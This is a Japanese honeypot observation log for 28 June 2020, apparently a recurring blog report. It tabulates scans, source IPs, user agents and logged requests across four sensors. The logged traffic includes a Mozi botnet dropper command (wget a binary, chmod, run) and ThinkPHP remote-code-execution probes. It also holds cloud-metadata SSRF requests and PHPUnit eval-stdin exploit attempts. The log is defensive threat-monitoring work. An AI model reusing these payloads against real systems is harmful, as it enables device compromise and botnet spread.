ハニーポット(仮) 観測記録 2020/06/28分です。
特徴
Location:JP
DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
AWS Security Scannerによるスキャン行為
XTCによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
WordPressへのスキャン行為
18[.]179[.]20[.]5に関する不正通信
を確認しました。
Location:US
GPONルータの脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
WordPressへのスキャン行為
UserAgentがHello, Worldであるアクセス
123[.]125[.]114[.]144に関する不正通信
を確認しました。
Location:UK
GPONルータの脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Tomcatへのスキャン行為
WordPressへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
Location:SG
DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
XTCによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
WordPressへのスキャン行為
を確認しました。
他
アクセス数推移
JP:総アクセス数:79 (前日比:+30)
US:総アクセス数:140 (前日比:+79)
UK:総アクセス数:30 (前日比:-109)
SG:総アクセス数:120 (前日比:+68)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 17 | 44.224.22.196 | United States |
| 17 | 44.225.84.206 | United States |
| 1 | 104.248.32.200 | United States |
| 1 | 105.159.6.192 | Morocco |
| 10 | 148.70.157.8 | China |
| 1 | 159.89.174.102 | United States |
| 1 | 162.243.131.135 | United States |
| 2 | 171.67.70.81 | United States |
| 1 | 171.67.71.96 | United States |
| 1 | 172.105.206.155 | United States |
| 1 | 185.202.1.188 | Netherlands |
| 1 | 192.241.228.141 | United States |
| 13 | 194.36.84.190 | Turkey |
| 2 | 194.180.224.130 | United Kingdom |
| 9 | 195.54.160.135 | Russia |
| 1 | 198.199.72.96 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 37 | - |
| 14 | AWS Security Scanner |
| 1 | Go-http-client/1.1 |
| 9 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
| 3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 |
| 2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 2 | Mozilla/5.0 zgrab/0.x |
| 1 | Python-urllib/3.7 |
| 1 | XTC |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | \x03 | ||
| 13 | \x16\x03\x01 | ||
| 10 | CONNECT | 18[.]179[.]20[.]5:80 | HTTP/1.0 |
| 1 | GET | /.git/HEAD | HTTP/1.1 |
| 2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 2 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /PMA | HTTP/1.1 |
| 1 | GET | /PMA/ | HTTP/1.1 |
| 1 | GET | /TP/html/public/index.php | HTTP/1.1 |
| 1 | GET | /TP/index.php | HTTP/1.1 |
| 1 | GET | /TP/public/index.php | HTTP/1.1 |
| 1 | GET | /admin | HTTP/1.1 |
| 1 | GET | /admin/ | HTTP/1.1 |
| 1 | GET | /dbadmin | HTTP/1.1 |
| 1 | GET | /elrekt.php | HTTP/1.1 |
| 1 | GET | /html/public/index.php | HTTP/1.1 |
| 1 | GET | /hudson | HTTP/1.1 |
| 1 | GET | /index.php | HTTP/1.1 |
| 2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
| 1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
| 4 | GET | /latest/dynamic/instance-identity/document | HTTP/1.1 |
| 1 | GET | /myadmin | HTTP/1.1 |
| 1 | GET | /myadmin/ | HTTP/1.1 |
| 1 | GET | /mysql | HTTP/1.1 |
| 1 | GET | /mysql/ | HTTP/1.1 |
| 1 | GET | /phpMyAdmin | HTTP/1.1 |
| 1 | GET | /phpmyadmin | HTTP/1.1 |
| 1 | GET | /phpmyadmin/ | HTTP/1.1 |
| 1 | GET | /phpmyadmin2 | HTTP/1.1 |
| 1 | GET | /portal/redlion | HTTP/1.1 |
| 1 | GET | /public/index.php | HTTP/1.1 |
| 2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
| 1 | GET | /wordpress/wp-login.php | HTTP/1.1 |
| 1 | GET | /wp/wp-login.php | HTTP/1.1 |
| 1 | GET | /wptest/wp-login.php | HTTP/1.1 |
| 2 | GET | http://[::ffff:a9fe:a9fe]/ | HTTP/1.1 |
| 2 | GET | http://[::ffff:a9fe:a9fe]/latest/dynamic/instance-identity/document | HTTP/1.1 |
| 2 | GET | http[:]//169[.]254[.]169[.]254/ | HTTP/1.1 |
| 2 | GET | http[:]//169[.]254[.]169[.]254/latest/dynamic/instance-identity/document | HTTP/1.1 |
| 2 | GET | http[:]//example[.]com/ | HTTP/1.1 |
| 1 | POST | /api/jsonws/invoke | HTTP/1.1 |
| 2 | POST | /boaform/admin/formLogin | HTTP/1.1 |
| 1 | POST | /cgi-bin/mainfunction.cgi | HTTP/1.1 |
| 1 | POST | /index.php?s=captcha | HTTP/1.1 |
Location:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 5.188.210.101 | Russia |
| 1 | 45.9.148.194 | Netherlands |
| 1 | 111.224.234.250 | China |
| 1 | 112.17.78.146 | China |
| 1 | 112.66.99.69 | China |
| 1 | 114.113.112.92 | China |
| 1 | 117.194.241.211 | India |
| 1 | 119.39.47.108 | China |
| 101 | 121.230.106.34 | China |
| 1 | 123.97.159.135 | China |
| 1 | 123.160.234.60 | China |
| 1 | 125.64.94.132 | China |
| 1 | 134.209.254.186 | United States |
| 1 | 139.59.136.64 | Singapore |
| 1 | 171.34.179.13 | China |
| 1 | 171.34.179.120 | China |
| 2 | 171.67.70.81 | United States |
| 1 | 171.67.71.96 | United States |
| 1 | 171.120.30.24 | China |
| 1 | 182.242.131.143 | China |
| 1 | 192.241.231.211 | United States |
| 2 | 194.180.224.130 | United Kingdom |
| 11 | 195.54.160.135 | Russia |
| 2 | 205.185.114.231 | United States |
| 1 | 219.140.118.212 | China |
| 1 | 220.200.158.146 | China |
| 1 | 222.186.19.210 | China |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 5 | - |
| 1 | Go-http-client/1.1 |
| 2 | Hello, World |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Safari/605.1.15 |
| 6 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 |
| 101 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
| 11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 |
| 2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 |
| 4 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
| 1 | Mozilla/5.0 zgrab/0.x |
| 3 | PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 4 | \x16\x03\x01 | ||
| 1 | CONNECT | cn[.]bing[.]com/:443 | HTTP/1.1 |
| 1 | CONNECT | ip[.]ws[.]126[.]net:443 | HTTP/1.1 |
| 1 | CONNECT | www[.]baidu[.]com/:443 | HTTP/1.1 |
| 1 | CONNECT | www[.]ipip[.]net/:443 | HTTP/1.1 |
| 2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 2 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /admin/login.asp | HTTP/1.1 |
| 1 | GET | /adminer/adminer.php | HTTP/1.1 |
| 1 | GET | /hudson | HTTP/1.1 |
| 2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
| 1 | GET | /manager/html | HTTP/1.1 |
| 101 | GET | /phpmyadmin/ | HTTP/1.1 |
| 2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | GET | /wordpress/wp-login.php | HTTP/1.1 |
| 1 | GET | /wp/wp-login.php | HTTP/1.1 |
| 1 | GET | http[:]//5[.]188[.]210[.]101/echo.php | HTTP/1.1 |
| 1 | GET | http[:]//boxun[.]com/ | HTTP/1.1 |
| 1 | GET | http[:]//www[.]123cha[.]com/ | HTTP/1.1 |
| 1 | GET | http[:]//www[.]epochtimes[.]com/ | HTTP/1.1 |
| 1 | GET | http[:]//www[.]minghui[.]org/ | HTTP/1.1 |
| 1 | GET | http[:]//www[.]rfa[.]org/english/ | HTTP/1.1 |
| 1 | GET | http[:]//www[.]wujieliulan[.]com/ | HTTP/1.1 |
| 1 | HEAD | http[:]//123[.]125[.]114[.]144/ | HTTP/1.1 |
| 2 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
| 1 | POST | /api/jsonws/invoke | HTTP/1.1 |
| 4 | POST | /boaform/admin/formLogin | HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:UK
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 49.149.139.153 | Philippines |
| 2 | 61.219.11.153 | Taiwan |
| 1 | 91.234.62.21 | Russia |
| 1 | 157.245.215.252 | United States |
| 1 | 162.243.128.13 | United States |
| 2 | 171.67.70.81 | United States |
| 1 | 171.67.71.96 | United States |
| 1 | 181.174.106.80 | Guatemala |
| 1 | 185.128.41.50 | Switzerland |
| 1 | 192.241.218.148 | United States |
| 3 | 194.180.224.130 | United Kingdom |
| 12 | 195.54.160.135 | Russia |
| 1 | 203.151.166.115 | Thailand |
| 2 | 205.185.114.231 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 7 | - |
| 1 | Hello, world |
| 1 | Java/1.8.0_131 |
| 12 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 |
| 4 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 2 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 2 | - | ||
| 3 | \x16\x03\x01 | ||
| 1 | GET | ../../proc/ HTTP | |
| 2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 2 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /hudson | HTTP/1.1 |
| 2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
| 1 | GET | /manager/html | HTTP/1.1 |
| 1 | GET | /portal/redlion | HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
| 2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | GET | /w00tw00t.at.ISC.SANS.DFind:) | HTTP/1.1 |
| 1 | GET | /wordpress/wp-login.php | HTTP/1.1 |
| 1 | GET | /wp/wp-login.php | HTTP/1.1 |
| 1 | GET | /wptest/wp-login.php | HTTP/1.1 |
| 2 | POST | /api/jsonws/invoke | HTTP/1.1 |
| 4 | POST | /boaform/admin/formLogin | HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 50.90.21.6 | United States |
| 1 | 159.18.94.65 | Canada |
| 2 | 171.67.70.81 | United States |
| 1 | 171.67.71.96 | United States |
| 1 | 186.101.230.155 | Ecuador |
| 1 | 192.241.194.63 | United States |
| 1 | 192.241.225.132 | United States |
| 2 | 194.180.224.130 | United Kingdom |
| 6 | 195.54.160.135 | Russia |
| 1 | 205.185.114.231 | United States |
| 1 | 206.225.74.190 | United States |
| 101 | 211.20.26.171 | Taiwan |
| 1 | 212.64.33.194 | China |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 4 | - |
| 101 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
| 6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 |
| 3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 2 | Mozilla/5.0 zgrab/0.x |
| 2 | XTC |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 3 | \x16\x03\x01 | ||
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 1 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /hudson | HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP | HTTP/1.1 |
| 101 | GET | /phpmyadmin/ | HTTP/1.1 |
| 1 | GET | /portal/redlion | HTTP/1.1 |
| 1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | GET | /wordpress/wp-login.php | HTTP/1.1 |
| 1 | GET | /wp/wp-login.php | HTTP/1.1 |
| 1 | OPTIONS | * | HTTP/1.1 |
| 2 | POST | /api/jsonws/invoke | HTTP/1.1 |
| 3 | POST | /boaform/admin/formLogin | HTTP/1.1 |
| 2 | POST | /cgi-bin/mainfunction.cgi | HTTP/1.1 |
